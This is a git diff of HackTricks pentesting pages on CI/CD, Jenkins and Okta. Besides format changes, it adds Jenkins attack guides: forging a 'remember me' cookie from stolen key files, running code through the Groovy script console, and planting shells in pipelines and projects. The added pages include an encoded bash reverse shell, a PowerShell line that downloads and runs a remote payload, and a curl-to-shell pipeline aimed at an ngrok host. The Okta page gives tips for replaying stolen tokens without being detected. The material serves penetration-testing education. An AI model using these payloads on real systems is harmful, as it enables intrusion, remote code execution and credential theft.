 Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as:
 
-* [Active Directory](https://plugins.jenkins.io/active-directory)
-* [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
-* [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
+- [Active Directory](https://plugins.jenkins.io/active-directory)
+- [GitHub Authentication](https://plugins.jenkins.io/github-oauth)
+- [Atlassian Crowd 2](https://plugins.jenkins.io/crowd2)
 
 ## Jenkins Nodes, Agents & Executors
 
@@ -82,9 +69,9 @@ An **executor** is a **slot for execution of tasks**; effectively, it is **a thr
 
 Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
 
-* `hudson.util.Secret`: used for generic secrets;
-* `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
-* `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
+- `hudson.util.Secret`: used for generic secrets;
+- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
+- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
 
 ### Credentials Access
 
@@ -96,25 +83,12 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
 
 ## References
 
-* [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
-* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
-* [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/)
-* [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/)
-* [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
-* [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
-* [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
+- [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
+- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
+- [https://www.jenkins.io/doc/developer/security/secrets/](https://www.jenkins.io/doc/developer/security/secrets/)
+- [https://www.jenkins.io/blog/2019/02/21/credentials-masking/](https://www.jenkins.io/blog/2019/02/21/credentials-masking/)
+- [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
+- [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
+- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
new file mode 100644
index 000000000..1839878a1
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
@@ -0,0 +1,105 @@
+# Jenkins Arbitrary File Read to RCE via "Remember Me"
+
+{{#include ../../banners/hacktricks-training.md}}
+
+In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
+
+This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
+
+### Attack Prerequisites
+
+- **Feature Requirement:** "Remember me" must be enabled (default setting).
+- **Access Levels:** Attacker needs Overall/Read permissions.
+- **Secret Access:** Ability to read both binary and textual content from key files.
+
+### Detailed Exploitation Process
+
+#### Step 1: Data Collection
+
+**User Information Retrieval**
+
+- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
+  - **Username**
+  - **User seed**
+  - **Timestamp**
+  - **Password hash**
+
+**Secret Key Extraction**
+
+- Extract cryptographic keys used for signing the cookie:
+  - **Secret Key:** `$JENKINS_HOME/secret.key`
+  - **Master Key:** `$JENKINS_HOME/secrets/master.key`
+  - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
+
+#### Step 2: Cookie Forging
+
+**Token Preparation**
+
+- **Calculate Token Expiry Time:**
+
+  ```javascript
+  tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
+  ```
+
+- **Concatenate Data for Token:**
+
+  ```javascript
+  token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
+  ```
+
+**MAC Key Decryption**
+
+- **Decrypt MAC Key File:**
+
+  ```javascript
+  key = toAes128Key(masterKey)  // Convert master key to AES128 key format
+  decrypted = AES.decrypt(macFile, key)  // Decrypt the .mac file
+  if not decrypted.hasSuffix("::::MAGIC::::")
+      return ERROR;
+  macKey = decrypted.withoutSuffix("::::MAGIC::::")
+  ```
+
+**Signature Computation**
+
+- **Compute HMAC SHA256:**
+
+  ```javascript
+  mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
+  tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
+  ```
+
+**Cookie Encoding**
+
+- **Generate Final Cookie:**
+
+  ```javascript
+  cookie = base64.encode(
+    username + ":" + tokenExpiryTime + ":" + tokenSignature
+  ) // Base64 encode the cookie data
+  ```
+
+#### Step 3: Code Execution
+
+**Session Authentication**
+
+- **Fetch CSRF and Session Tokens:**
+  - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
+  - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
+
+**Command Execution Request**
+
+- **Send a POST Request with Groovy Script:**
+
+  ```bash
+  curl -X POST "$JENKINS_URL/scriptText" \
+  --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
+  --header "Jenkins-Crumb: $CRUMB" \
+  --header "Content-Type: application/x-www-form-urlencoded" \
+  --data-urlencode "script=$SCRIPT"
+  ```
+
+  - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
+
+The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
similarity index 52%
rename from pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
rename to src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
index 1d1b94715..035e24e4f 100644
--- a/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -1,23 +1,9 @@
 # Jenkins Dumping Secrets from Groovy
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#include ../../banners/hacktricks-training.md}}
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
-
-{% hint style="warning" %}
-Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-{% endhint %}
+> [!WARNING]
+> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
 
 You can **dump all the secrets from the Groovy Script console** in `/script` running this code
 
@@ -100,17 +86,4 @@ for (c in creds) {
 }
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
new file mode 100644
index 000000000..f34e83a69
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -0,0 +1,39 @@
+# Jenkins RCE Creating/Modifying Pipeline
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Creating a new Pipeline
+
+In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+
+![](<../../images/image (235).png>)
+
+In the **Pipeline section** write the **reverse shell**:
+
+![](<../../images/image (285).png>)
+
+```groovy
+pipeline {
+    agent any
+
+    stages {
+        stage('Hello') {
+            steps {
+                sh '''
+                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+                '''
+            }
+        }
+    }
+}
+```
+
+Finally click on **Save**, and **Build Now** and the pipeline will be executed:
+
+![](<../../images/image (228).png>)
+
+## Modifying a Pipeline
+
+If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
new file mode 100644
index 000000000..6afbea340
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -0,0 +1,36 @@
+# Jenkins RCE Creating/Modifying Project
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Creating a Project
+
+This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+
+1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
+2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
+3. Click **Build now**
+   1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
+   2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`**
+
+![](<../../images/image (165).png>)
+
+## Modifying a Project
+
+Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+
+![](<../../images/image (265).png>)
+
+If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+
+Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+
+## Execution
+
+If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+
+![](<../../images/image (98).png>)
+
+Click on **Save** and **build** the project and your **command will be executed**.\
+If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
new file mode 100644
index 000000000..d7b9fa3eb
--- /dev/null
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -0,0 +1,63 @@
+# Jenkins RCE with Groovy Script
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Jenkins RCE with Groovy Script
+
+This is less noisy than creating a new project in Jenkins
+
+1. Go to _path_jenkins/script_
+2. Inside the text box introduce the script
+
+```python
+def process = "PowerShell.exe ".execute()
+println "Found text ${process.text}"
+```
+
+You could execute a command using: `cmd.exe /c dir`
+
+In **linux** you can do: **`"ls /".execute().text`**
+
+If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
+
+**Another useful groovy script** is (replace \[INSERT COMMAND]):
+
+```python
+def sout = new StringBuffer(), serr = new StringBuffer()
+def proc = '[INSERT COMMAND]'.execute()
+proc.consumeProcessOutput(sout, serr)
+proc.waitForOrKill(1000)
+println "out> $sout err> $serr"
+```
+
+### Reverse shell in linux
+
+```python
+def sout = new StringBuffer(), serr = new StringBuffer()
+def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
+proc.consumeProcessOutput(sout, serr)
+proc.waitForOrKill(1000)
+println "out> $sout err> $serr"
+```
+
+### Reverse shell in windows
+
+You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
+
+```python
+scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
+echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
+cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc 
+```
+
+### Script
+
+You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
+
+You can use MSF to get a reverse shell:
+
+```
+msf> use exploit/multi/http/jenkins_script_console
+```
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md
similarity index 66%
rename from pentesting-ci-cd/okta-security/README.md
rename to src/pentesting-ci-cd/okta-security/README.md
index ebb5511bf..10d34c1e4 100644
--- a/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -1,19 +1,6 @@
 # Okta Security
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -21,21 +8,19 @@ Learn & practice GCP Hacking:  [!CAUTION]
+> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
 
-{% hint style="success" %}
-To perform a security review of an Okta environment you should ask for **administrator read-only access**.
-{% endhint %}
+> [!TIP]
+> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
 
 ### Summary
 
@@ -45,11 +30,10 @@ There are also **authenticators**: different options to authenticate like passwo
 
 Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
 
-{% hint style="danger" %}
-The most powerful role is **Super Administrator**.
-
-If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
-{% endhint %}
+> [!CAUTION]
+> The most powerful role is **Super Administrator**.
+>
+> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
 
 ## Attacks
 
@@ -96,7 +80,7 @@ Therefore, if the app is trusting the field **`userName`**, you probably won't b
 Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
 Therefore, the app should have this field enabled if it exists:
 
-

+

 
 I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
 
@@ -108,36 +92,23 @@ Behavioral detection policies in Okta might be unknown until encountered, but **
 
 Key recommendations include:
 
-* **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
-* Ensure **consistent user-agent strings** between the client and replayed access tokens.
-* **Refrain from replaying** tokens from different users from the same IP address.
-* Exercise caution when replaying tokens against the Okta dashboard.
-* If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
+- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
+- Ensure **consistent user-agent strings** between the client and replayed access tokens.
+- **Refrain from replaying** tokens from different users from the same IP address.
+- Exercise caution when replaying tokens against the Okta dashboard.
+- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
 
 ## Okta Hardening
 
 Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
 
-{% content-ref url="okta-hardening.md" %}
-[okta-hardening.md](okta-hardening.md)
-{% endcontent-ref %}
+{{#ref}}
+okta-hardening.md
+{{#endref}}
 
 ## References
 
-* [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
-* [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
+- [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers)
+- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md
similarity index 73%
rename from pentesting-ci-cd/okta-security/okta-hardening.md
rename to src/pentesting-ci-cd/okta-security/okta-hardening.md
index 806102163..231b4c822 100644
--- a/pentesting-ci-cd/okta-security/okta-hardening.md
+++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md
@@ -1,19 +1,6 @@
 # Okta Hardening
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Directory
 
@@ -82,11 +69,11 @@ Here you can find all the **configured applications** and their details: Who has
 
 In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots:
 
-

+

 
 And you could see some more details about the app (like the password reveal feature, if it's enabled):
 
-

+

 
 ## Identity Governance
 
@@ -100,14 +87,14 @@ I haven't seen it used, but I guess that from a defensive point of view it's a n
 
 ### General
 
-* **Security notification emails**: All should be enabled.
-* **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
-* **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
-* **User enumeration prevention**: Both should be enabled
-  * Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
-    * Self-Service Registration
-    * JIT flows with email authentication
-* **Okta ThreatInsight settings**: Log and enforce security based on threat level
+- **Security notification emails**: All should be enabled.
+- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha
+- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok)
+- **User enumeration prevention**: Both should be enabled
+  - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information):
+    - Self-Service Registration
+    - JIT flows with email authentication
+- **Okta ThreatInsight settings**: Log and enforce security based on threat level
 
 ### HealthInsight
 
@@ -119,7 +106,7 @@ Here you can find all the authentication methods that a user could use: Password
 
 In the **Enrollment** tab you can see how the ones that are required or optinal:
 
-

+

 
 It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn.
 
@@ -133,7 +120,7 @@ Here you can find the **requirements to access each application**. It's recommen
 
 Here you can find the session policies assigned to different groups. For example:
 
-

+

 
 It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location.
 
@@ -161,9 +148,9 @@ From an attackers perspective it's interesting to know which Ps are allowed (and
 
 ### Device Integrations
 
-* **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
-  * I haven't seen this used yet. TODO
-* **Notification services**: I haven't seen this used yet. TODO
+- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application.
+  - I haven't seen this used yet. TODO
+- **Notification services**: I haven't seen this used yet. TODO
 
 ### API
 
@@ -209,17 +196,4 @@ Here you can find **generic information** about the Okta environment, such as th
 
 Here you can download Okta agents to sync Okta with other technologies.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
similarity index 55%
rename from pentesting-ci-cd/pentesting-ci-cd-methodology.md
rename to src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
index 58cde5a81..1fb5c1428 100644
--- a/pentesting-ci-cd/pentesting-ci-cd-methodology.md
+++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md
@@ -1,31 +1,18 @@
 # Pentesting CI/CD Methodology
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#include ../banners/hacktricks-training.md}}
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
-
-

+

 
 ## VCS
 
 VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**:
 
-* Github
-* Gitlab
-* Bitbucket
-* Gitea
-* Cloud providers (they offer their own VCS platforms)
+- Github
+- Gitlab
+- Bitbucket
+- Gitea
+- Cloud providers (they offer their own VCS platforms)
 
 ## CI/CD Pipelines
 
@@ -35,24 +22,23 @@ However, these systems need to be **executed somewhere** and usually with **priv
 
 ## VCS Pentesting Methodology
 
-{% hint style="info" %}
-Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
-{% endhint %}
+> [!NOTE]
+> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code.
 
 Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse:
 
-* **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
-* **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
-  * **Register**: Some platforms will just allow external users to create an account.
-  * **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
-  * **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
-* **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
-  * If no secret is in place, the attacker could abuse the webhook of the third party platform
-  * If the secret is in the URL, the same happens and the attacker also have the secret
-* **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
-  * Compromise the main branch to **compromise production**.
-  * Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
-  * **Compromise the pipeline** (check next section)
+- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks.
